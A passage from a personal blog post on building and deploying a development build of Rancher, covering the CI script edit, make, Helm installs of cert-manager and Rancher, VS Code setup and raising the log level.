</code></pre><figcaption>Editing the ci script</figcaption></figure><p>The new ci script looks like this for me.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">#!/bin/bash
set -e

cd $(dirname $0)

./validate
./build
#./test
./package
./chart/ci</code></pre><figcaption>Contents of the ci file in the scripts directory</figcaption></figure><p>We need to commit the change to the ci script and run &quot;make&quot;. If you do not commit the change to git, the build process will tell you the repository is dirty.</p><figure class="kg-card kg-code-card"><pre><code>git config --global user.email &quot;feaxblog@gmail.com&quot;
git config --global user.name &quot;Marco Stuurman&quot;
git commit -am &quot;Disable tests for development&quot;
make
# If it fails because of a timeout, try once more</code></pre><figcaption>Committing the changes</figcaption></figure><p>Running the make command may take a long time, depending on the system resources you&apos;ve given the VM. The first build took me about 30 minutes. Once the building process finishes, you&apos;ll see docker images with the same tag as &quot;VERSION&quot; in the local registry.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">marco@rdev:~/rancher$ docker images
REPOSITORY                     TAG              IMAGE ID       CREATED          SIZE
rancher/rancher-runtime        b209dbd85        8c3c1beccbe7   25 minutes ago   269MB
rancher/rancher-agent          b209dbd85        bd7908b20a0f   25 minutes ago   533MB
rancher/rancher                b209dbd85        3c4a1c6ce2d1   26 minutes ago   1.17GB</code></pre><figcaption>The output of docker images</figcaption></figure><p>The build process will automatically generate a HELM chart to deploy your development build version of Rancher. Let&apos;s deploy Rancher!</p><p>First, we need to install a cert-manager to let Rancher deal with the certificates.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">kubectl apply -f https://github.com/jetstack/cert-manager/releases/download/v1.5.1/cert-manager.crds.yaml
helm repo add jetstack https://charts.jetstack.io
helm repo update
helm install cert-manager jetstack/cert-manager \
  --namespace cert-manager \
  --create-namespace \
  --version v1.5.1</code></pre><figcaption>Install cert-manager</figcaption></figure><p>Once that is installed, let&apos;s install Rancher itself.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">kubectl create namespace cattle-system
helm install rancher \
  bin/chart/dev/rancher-0.0.0-1642269672.commit-b209dbd85.HEAD.tgz \
  --namespace cattle-system \
  --set hostname=rancher.your.domain \
  --set replicas=1 \
  --set bootstrapPassword=SomeGeneratedP4ssw0rd
</code></pre><figcaption>Install your development Rancher</figcaption></figure><p>Let&apos;s check if Rancher can start.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell">marco@rdev:~/rancher$ kubectl get pods -n cattle-system
NAME                       READY   STATUS    RESTARTS      AGE
rancher-68b5949696-nqts9   0/1     Running   0             16s
rancher-68b5949696-qk9ng   0/1     Running   0             16s
rancher-68b5949696-h5k9z   0/1     Running   1 (13s ago)   16s</code></pre><figcaption>Rancher installation in progress</figcaption></figure><figure class="kg-card kg-code-card"><pre><code>marco@rdev:~/rancher$ kubectl get pods -n cattle-system
NAME                               READY   STATUS      RESTARTS        AGE
rancher-68b5949696-h5k9z           1/1     Running     1 (3m27s ago)   3m30s
rancher-68b5949696-nqts9           1/1     Running     0               3m30s
rancher-68b5949696-qk9ng           1/1     Running     0               3m30s
helm-operation-s768m               0/2     Completed   0               2m53s
helm-operation-tvx2n               0/2     Completed   0               2m21s
rancher-webhook-5d4f5b7f6d-7mfhc   1/1     Running     0               2m9s
helm-operation-fm9z4               0/2     Completed   0               2m13s</code></pre><figcaption>Rancher is ready!</figcaption></figure><p>Let&apos;s open up the domain given to HELM in a browser.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://fe.ax/content/images/2022/01/image.png" class="kg-image" alt loading="lazy" width="1270" height="842" srcset="https://fe.ax/content/images/size/w600/2022/01/image.png 600w, https://fe.ax/content/images/size/w1000/2022/01/image.png 1000w, https://fe.ax/content/images/2022/01/image.png 1270w" sizes="(min-width: 720px) 720px"><figcaption>Rancher dashboard</figcaption></figure><p>That worked! Now we can log in using the password given to HELM.</p><p>Once logged in, we can see our development version of Rancher running by checking the hamburger menu on the left top side.</p><figure class="kg-card kg-image-card"><img src="https://fe.ax/content/images/2022/01/image-1.png" class="kg-image" alt loading="lazy" width="1270" height="842" srcset="https://fe.ax/content/images/size/w600/2022/01/image-1.png 600w, https://fe.ax/content/images/size/w1000/2022/01/image-1.png 1000w, https://fe.ax/content/images/2022/01/image-1.png 1270w" sizes="(min-width: 720px) 720px"></figure><p>Lets&apos;s set up Virtual Studio Code (vscode for short).</p><p>First, we need to <a href="https://code.visualstudio.com/download">install vscode</a>. Which should be pretty straightforward.</p><p>Next, we should install some extensions. The following will be needed:</p><ul><li><a href="Name: Remote - SSH Id: ms-vscode-remote.remote-ssh Description: Open any folder on a remote machine using SSH and take advantage of VS Code&apos;s full feature set. Version: 0.70.0 Publisher: Microsoft VS Marketplace Link: https://marketplace.visualstudio.com/items?itemName=ms-vscode-remote.remote-ssh">Remote - SSH</a></li><li><a href="https://marketplace.visualstudio.com/items?itemName=golang.Go">Go</a></li></ul><p>Next we&apos;</p><p>From now on, you can change whatever you need to the code, commit, build, helm upgrade and test.</p><p>I hope I find this blog post very interesting when I refresh my memory. To everyone else who reads this, thank you!</p><p>Additional information:</p><p>Don&apos;t forget to <a href="https://rancher.com/docs/rancher/v2.5/en/troubleshooting/logging/#how-to-configure-a-log-level">up the log level</a></p><pre><code class="language-shell">kubectl -n cattle-system get pods -l app=rancher --no-headers -o custom-columns=name:.metadata.name | while read rancherpod; do kubectl -n cattle-system exec $rancherpod -c rancher -- loglevel --set debug; done</code></pre>]]></content:encoded></item></channel></rss>